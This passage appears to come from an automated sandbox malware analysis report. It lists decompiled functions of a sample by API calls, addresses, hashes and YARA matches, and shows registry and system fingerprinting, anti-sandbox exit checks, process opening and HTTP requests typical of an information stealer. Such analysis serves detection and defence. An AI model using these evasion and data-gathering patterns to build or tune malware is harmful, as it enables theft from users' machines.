                              • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0073F680,00000000,000F003F,?,00000400), ref: 004184EC
                              • lstrlenA.KERNEL32(?), ref: 00418501
                              • RegQueryValueExA.ADVAPI32(00000000,0073F500,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                              • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                              • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                              • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                              • Instruction ID: a8d43c492d7d6147a6ac3b4b495328721cac0bdb4fda7375b645000892042c31
                              • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                              • Instruction Fuzzy Hash: F5215BB5D00219ABDF10DFA4EC48AEDBB75FF04320F008225F929A7290EB706A05CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                              • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0070A338,00000000,00020119,00000000), ref: 004176DD
                              • RegQueryValueExA.ADVAPI32(00000000,0073F6F8,00000000,00000000,?,000000FF), ref: 004176FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3466090806-2517555085
                              • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                              • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                              • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                              • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F790B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F7912
                              • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022F7944
                              • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022F7965
                              • RegCloseKey.ADVAPI32(00000000), ref: 022F796F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                              • Instruction ID: 87d877fa59fbaa6c8ea20321ce2aa53ff228c707c175ba53dda5d6953ad90a4f
                              • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                              • Instruction Fuzzy Hash: 49012CB9A80209BBEB10DBE0DD49FADB7B9EB48701F005164BA0596284D6749900CF51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                              • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0070A338,00000000,00020119,004176B9), ref: 0041775B
                              • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                              • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3466090806-1022791448
                              • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                              • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                              • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                              • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                              APIs
                              • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                              • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                              • CloseHandle.KERNEL32(000000FF), ref: 00419327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :A$:A
                              • API String ID: 1378416451-1974578005
                              • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                              • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                              • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                              • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                              • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                              • HeapFree.KERNEL32(00000000), ref: 022E76C0
                                • Part of subcall function 022E94A7: vsprintf_s.MSVCRT ref: 022E94C2
                              • task.LIBCPMTD ref: 022E77BC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                              • String ID:
                              • API String ID: 700816787-0
                              • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                              • Instruction ID: 016dc93e85b805816bedacee705b5acf0006b569dc39df1aa97c86f7f1d92936
                              • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                              • Instruction Fuzzy Hash: 26613DB591026C9BDF24DB90CC41FE9B7B9BF44300F4081E9E68AA6144EBB05BC5DF91
                              APIs
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022E6548
                                • Part of subcall function 022E64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 022E656A
                                • Part of subcall function 022E64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022E659C
                                • Part of subcall function 022E64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022E65EC
                                • Part of subcall function 022E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
                                • Part of subcall function 022E64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022E6638
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                              • lstrlen.KERNEL32(00000000), ref: 022F5596
                                • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                              • lstrlen.KERNEL32(00000000), ref: 022F55EA
                              • strtok.MSVCRT(00000000,?), ref: 022F5605
                              • lstrlen.KERNEL32(00000000), ref: 022F5615
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                              • String ID:
                              • API String ID: 3532888709-0
                              • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                              • Instruction ID: 2e94e57ee7bd006ace08b5aa9786c55100ad72b271a6cd4957ed0b52d2c8f3bc
                              • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                              • Instruction Fuzzy Hash: 8651BB715203489BCB68EFE4DEA5AEDB776AF10301F904038EA0A66694DB346B49CF51
                              APIs
                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 022F7345
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • OpenProcess.KERNEL32(001FFFFF,00000000,022F7574,004205BD), ref: 022F7383
                              • memset.MSVCRT ref: 022F73D1
                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 022F7525
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: OpenProcesslstrcpymemset
                              • String ID:
                              • API String ID: 224852652-0
                              • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                              • Instruction ID: ec03d3f3d8c1cbde2bd9eca07fd8be41c342852b5703ea6fe1a482844a79d522
                              • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                              • Instruction Fuzzy Hash: 56518FB1C203199BDBA4DBE4DC84BEDF775AF44305F5040B8E609A7284DB746A88CF58
                              APIs
                              • memset.MSVCRT ref: 004140D5
                              • RegOpenKeyExA.ADVAPI32(80000001,007403C8,00000000,00020119,?), ref: 004140F4
                              • RegQueryValueExA.ADVAPI32(?,00740540,00000000,00000000,00000000,000000FF), ref: 00414118
                              • RegCloseKey.ADVAPI32(?), ref: 00414122
                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                              • lstrcatA.KERNEL32(?,00740720), ref: 0041415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                              • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                              • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                              • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                              APIs
                              • memset.MSVCRT ref: 022F433C
                              • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022F435B
                              • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022F437F
                              • RegCloseKey.ADVAPI32(?), ref: 022F4389
                              • lstrcat.KERNEL32(?,00000000), ref: 022F43AE
                              • lstrcat.KERNEL32(?,0064A168), ref: 022F43C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                              • Instruction ID: 416fecc4e2f557640287aa9c71e1c30ad43fa06f8c2e7e63c33b1aa53bcb34a7
                              • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                              • Instruction Fuzzy Hash: E041C7B69502087BDB14FBE0DC46FEF733AAB49700F004558A71957184EAB55A98CFE1
                              APIs
                              • strtok_s.MSVCRT ref: 00413588
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • strtok_s.MSVCRT ref: 004136D1
                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0070F550,?,0042110C,?,00000000), ref: 0041A82B
                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpystrtok_s$lstrlen
                              • String ID:
                              • API String ID: 3184129880-0
                              • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                              • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                              • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                              • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                              APIs
                              • __lock.LIBCMT ref: 0041B39A
                                • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                              • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                              • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                              • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                              • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                              • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                              • String ID:
                              • API String ID: 2005412495-0
                              • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                              • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                              • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                              • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                              APIs
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,q), ref: 022F9B51
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,ap), ref: 022F9B9A
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,q), ref: 022F9BCB
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,(q), ref: 022F9BFC
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                • Part of subcall function 022F9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022E1437: ExitProcess.KERNEL32 ref: 022E1478
                                • Part of subcall function 022E13C7: GetSystemInfo.KERNEL32(?), ref: 022E13D1
                                • Part of subcall function 022E13C7: ExitProcess.KERNEL32 ref: 022E13E5
                                • Part of subcall function 022E1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022E1392
                                • Part of subcall function 022E1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022E1399
                                • Part of subcall function 022E1377: ExitProcess.KERNEL32 ref: 022E13AA
                                • Part of subcall function 022E1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022E14A5
                                • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14BF
                                • Part of subcall function 022E1487: __aulldiv.LIBCMT ref: 022E14CD
                                • Part of subcall function 022E1487: ExitProcess.KERNEL32 ref: 022E14FB
                                • Part of subcall function 022F69D7: GetUserDefaultLangID.KERNEL32 ref: 022F69DB
                                • Part of subcall function 022E13F7: ExitProcess.KERNEL32 ref: 022E142D
                                • Part of subcall function 022F7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022E141E), ref: 022F7AE7
                                • Part of subcall function 022F7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F7AEE
                                • Part of subcall function 022F7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022F7B06
                                • Part of subcall function 022F7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022F7B77
                                • Part of subcall function 022F7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022F7B7E
                                • Part of subcall function 022F7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022F7B96
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                              • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                              • Sleep.KERNEL32(00001770), ref: 022F6D6B
                              • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                              • ExitProcess.KERNEL32 ref: 022F6D89
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                              • Instruction ID: 417c4337a14bd03aa24b9d96b69d9c7b9ca1aa6d988d8f6a3b71d8e46c256cfb
                              • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                              • Instruction Fuzzy Hash: 8A312876A60308AADB84FBF0DC55BFDF37AAF14300F504538A616A6298EF745A44CE61
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                              • LocalFree.KERNEL32(004102E7), ref: 00409A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
